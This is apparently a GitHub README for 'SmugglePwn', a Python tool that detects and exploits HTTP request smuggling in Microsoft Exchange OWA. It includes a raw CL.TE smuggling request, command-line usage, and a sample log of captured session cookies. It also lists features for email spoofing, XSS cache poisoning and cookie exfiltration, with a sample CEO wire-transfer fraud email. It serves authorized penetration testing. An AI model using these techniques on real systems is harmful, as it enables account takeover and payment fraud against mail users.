SmugglePwn - Advanced HTTP Request Smuggling Exploitation Framework

Professional-grade tool for detecting and exploiting Client-Side HTTP Desync vulnerabilities in Microsoft Exchange OWA and other web applications.

SmugglePwn is a comprehensive exploitation framework designed for security professionals to identify, verify, and demonstrate HTTP Request Smuggling (HRS) vulnerabilities with emphasis on Microsoft Exchange OWA environments.

🚀 Features

🎯 Core Vulnerability Detection

• CL.TE & TE.CL Detection - Comprehensive detection of both smuggling variants
• Double/Triple Response Detection - Identify when one request generates multiple responses (strongest evidence)
• Response Queuing Attacks - Demonstrate cross-user contamination potential
• Out-of-Band Verification - Burp Collaborator/OAST integration for irrefutable proof

📧 Advanced Exploitation

• Interactive Email Spoofing - Send emails from any sender with custom content
• XSS Cache Poisoning - Poison caches to compromise multiple users simultaneously
• Cookie Exfiltration - Steal session cookies via XSS with real-time monitoring
• Session Hijacking - Use stolen cookies for account takeover

🛠️ Professional Tooling

• Local POC Server - Built-in HTTP server for receiving stolen cookies
• Port Selection - Choose from standard ports (80, 443) or custom ports
• Proxy Support - Full proxy configuration with CONNECT method for HTTPS
• Multi-Format Reporting - Generate reports in TXT, HTML, JSON, or Markdown
• Verbose Packet Inspection - Full request/response visualization for debugging

📋 Prerequisites

• Python 3.7 or higher
• No external dependencies required! All libraries are part of the Python standard library:
  • socket - Network communication
  • ssl - HTTPS support
  • argparse - Command-line argument parsing
  • json - Report generation
  • threading - Concurrent POC server operation
  • http.server - Local HTTP server for cookie exfiltration

⚡ Quick Installation

# Clone the repository
git clone https://github.com/V3kt0r39/SmugglePwn.git
cd SmugglePwn

# Make executable (optional)
chmod +x hrs_exploit.py

# Run directly
python3 hrs_exploit.py

📖 Usage Guide

Basic Syntax

python3 hrs_exploit.py <target> [port] [options]

Interactive Mode (Recommended)

# Start with interactive configuration menu
python3 hrs_exploit.py email.example.com

The interactive menu will guide you through:

• Port selection (443, 80, 8443, or custom)
• Session cookie configuration (optional)
• Exfiltration method (Local POC Server, Collaborator, Custom URL, or Skip)
• Proxy configuration (optional)
• Output verbosity (VERBOSE or NORMAL) Direct Mode (Advanced)

# With session cookie for email spoofing
python3 hrs_exploit.py email.example.com 443 \
  --session "ASP.NET_SessionId=abc123"

# With Collaborator for OAST verification
python3 hrs_exploit.py email.example.com \
  --collaborator "abc123.oastify.com"

# With proxy and session
python3 hrs_exploit.py email.example.com 443 \
  --session "ASP.NET_SessionId=abc123" \
  --proxy "127.0.0.1:8080"

# Skip interactive menu
python3 hrs_exploit.py email.example.com 443 \
  --session "ASP.NET_SessionId=abc123" \
  --no-interactive

🎮 Interactive Configuration Menu

When you run SmugglePwn without arguments, you'll see this professional configuration interface:

================================================================================
  🔧 INTERACTIVE CONFIGURATION MENU
================================================================================

[1/7] Select target port:
    1. 443 (HTTPS - Default for OWA)
    2. 80 (HTTP)
    3. 8443 (Alternative HTTPS)
    4. Custom port

[?] Enter choice (1-4): 1
[+] Port selected: 443 (HTTPS)

[2/7] Session cookie configuration:
    Leave empty to skip (will only test infrastructure vulnerability)
[?] Enter ASP.NET_SessionId (or press Enter to skip): ASP.NET_SessionId=abc123
[+] Session cookie configured

[3/7] Cookie exfiltration method:
    1. Local POC Server (run HTTP server on your machine)
    2. Burp Collaborator / OAST (external service)
    3. Custom URL (your own server)
    4. Skip (no exfiltration)

[?] Enter choice (1-4): 1
...

🔬 Testing Methodology

Phase 1: CL.TE Vulnerability Detection Tests for Content-Length vs Transfer-Encoding desync using unique markers.

Phase 2: Double/Triple Response Detection Detects when a single request generates multiple responses (definitive proof).

Phase 3: Response Queuing Attack Demonstrates how your request can affect other users (cross-contamination).

Phase 4: Collaborator OAST Verification Uses Burp Collaborator for out-of-band verification (irrefutable proof).

Phase 5: Interactive Email Spoofing Send spoofed emails with fully customizable parameters:

• From address (spoofed sender)
• To address (recipient)
• Subject
• Body (multi-line support)

Phase 6: XSS Cache Poisoning with Cookie Exfiltration Injects XSS payload to steal session cookies from multiple users.

📊 Report Generation

After testing, choose your preferred report format:

================================================================================
  📊 REPORT GENERATION
================================================================================

📝 Select report format:
  1. Text (.txt)        - Detailed console-friendly format
  2. HTML (.html)       - Professional visual report with styling (RECOMMENDED)
  3. JSON (.json)       - Machine-readable format for automation
  4. Markdown (.md)     - GitHub/GitLab friendly format
  5. All formats        - Generate TXT + HTML + JSON + MD

Report Contents:

• Vulnerability Detection Results (CL.TE, double response, Collaborator status)
• Attack Vector Results (Email spoofing, XSS poisoning, cookies stolen)
• Email Spoofing History (Complete log of sent emails)
• Stolen Cookies (Session cookies captured during testing)
• Technical Analysis (Root cause and exploitation method)
• Critical Recommendations (Immediate, short-term, and long-term actions)

🎯 Example Workflows

Workflow 1: Basic Vulnerability Detection

# Run with interactive menu
python3 hrs_exploit.py email.example.com

# Follow prompts:
# 1. Port: 443
# 2. Session: (skip)
# 3. Exfiltration: Skip
# 4. Proxy: (skip)
# 5. Verbose: VERBOSE

# Results:
# ✅ CL.TE vulnerability confirmed
# ✅ Double response detected
# 📄 Report saved to hrs_report_email_example_com_TIMESTAMP.txt

Workflow 2: Full Exploitation with Session Cookie

# Configure with session and POC server
python3 hrs_exploit.py email.example.com

# Follow prompts:
# 1. Port: 443
# 2. Session: ASP.NET_SessionId=abc123
# 3. Exfiltration: Local POC Server → Port 9600
# 4. Proxy: (skip)
# 5. Verbose: VERBOSE

# During email spoofing:
# From: ceo@company.com
# To: employee@company.com
# Subject: URGENT: Wire Transfer Required
# Body: Please transfer $50,000 immediately...

Workflow 3: Collaborator-Based Verification

# Use Burp Collaborator for irrefutable proof
python3 hrs_exploit.py email.example.com

# Follow prompts:
# 1. Port: 443
# 2. Session: (skip)
# 3. Exfiltration: Collaborator → abc123.oastify.com
# 4. Proxy: (skip)
# 5. Verbose: VERBOSE

🔍 Understanding the Output

Packet Visualization (Verbose Mode)

----------------------------------------------------------------------
📤 REQUEST: CL.TE DETECTION PAYLOAD
----------------------------------------------------------------------
  1 | POST /owa/auth/logon.aspx HTTP/1.1
  2 | Host: email.example.com
  3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  4 | Content-Type: application/x-www-form-urlencoded
  5 | Content-Length: 4
  6 | Transfer-Encoding: chunked
  7 | 
  8 | 6c
  9 | GET /owa/auth/logon.aspx?marker=CLTE_TEST_1770298756 HTTP/1.1
 10 | Host: email.example.com
 11 | Content-Length: 0
 12 | 
 13 | 0
 14 | 
----------------------------------------------------------------------

Double Response Detection

[!] ✅✅✅ DOUBLE/ TRIPLE RESPONSE CONFIRMED!
    Single request → 2 responses
    This is DEFINITIVE PROOF of request smuggling vulnerability!

Cookie Exfiltration (Real-Time)

======================================================================
  🎯 COOKIE CAPTURED
======================================================================
  Time:    2026-02-05 14:32:45
  IP:      192.168.1.100
  Cookie:  ASP.NET_SessionId=abc123; OtherCookie=value
======================================================================

[+] Total cookies stolen so far: 1
    Continue waiting? (Press Ctrl+C to stop and save)

🗂️ Project Structure

SmugglePwn/
├── hrs_exploit.py               # Main exploitation framework
├── README.md                    # This documentation
├── .gitignore                   # Git ignore rules
├── LICENSE                      # MIT License
├── examples/                    # Example usage scenarios
│   ├── basic_detection.txt
│   ├── email_spoofing_demo.txt
│   └── collaborator_verification.txt
└── reports/                     # Sample reports (generated after running)
    ├── hrs_report_*.txt
    ├── hrs_report_*.html
    └── stolen_cookies_*.json

⚖️ Legal Disclaimer

This tool is for authorized security testing only.

✅ Use only on systems you own or have explicit permission to test ✅ Ensure you have written authorization before testing any target ✅ Follow all applicable laws and regulations ✅ Use responsibly and ethically

The author is not responsible for any misuse or damage caused by this tool.

📜 License

MIT License

Copyright (c) 2024 Bitrix Pentest Tool Contributors

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

📚 References & Resources

HTTP Request Smuggling

• PortSwigger: HTTP Request Smuggling
• PortSwigger: Client-Side Desync
• HTTP Desync Attacks: Request Smuggling Reborn

Microsoft Exchange Security

• Microsoft Exchange Hardening Guide
• OWA Security Best Practices

Tools & Frameworks

• Burp Suite Professional
• Burp Collaborator
• OWASP ZAP

🤝 Contributing

Contributions are welcome! Please feel free to submit a Pull Request.

Areas for improvement:

• Additional payload templates
• More target-specific modules (SharePoint, IIS, etc.)
• Automated session cookie acquisition
• Integration with other security tools
• Enhanced reporting features

📧 Contact & Support

For educational purposes only. If you have questions about the tool or need help with legitimate security testing:

• 📖 Read the documentation carefully
• 🔍 Check the examples in the examples/ directory
• 💬 Join security communities and forums
• 🎓 Study HTTP protocol specifications (RFC 7230, RFC 9110)

🙏 Acknowledgments

• PortSwigger Research Team - For groundbreaking research on HTTP desync vulnerabilities
• James Kettle - For discovering and documenting Client-Side Desync
• OWASP Community - For security testing guidelines and best practices
• All security researchers - For advancing web application security

🚀 Quick Start Guide

# 1. Clone the repository
git clone https://github.com/V3kt0r39/SmugglePwn.git
cd SmugglePwn

# 2. Run with interactive menu (recommended)
python3 hrs_exploit.py email.example.com

# 3. Follow the prompts to configure:
#    - Target port
#    - Session cookie (optional)
#    - Exfiltration method
#    - Proxy settings (optional)
#    - Output verbosity

# 4. Watch the tool in action:
#    - Vulnerability detection
#    - Email spoofing (if session provided)
#    - XSS cache poisoning
#    - Cookie exfiltration (real-time)

# 5. Generate professional reports
#    Choose from TXT, HTML, JSON, or Markdown formats

Happy (ethical) hacking! 🔒

Remember: With great power comes great responsibility.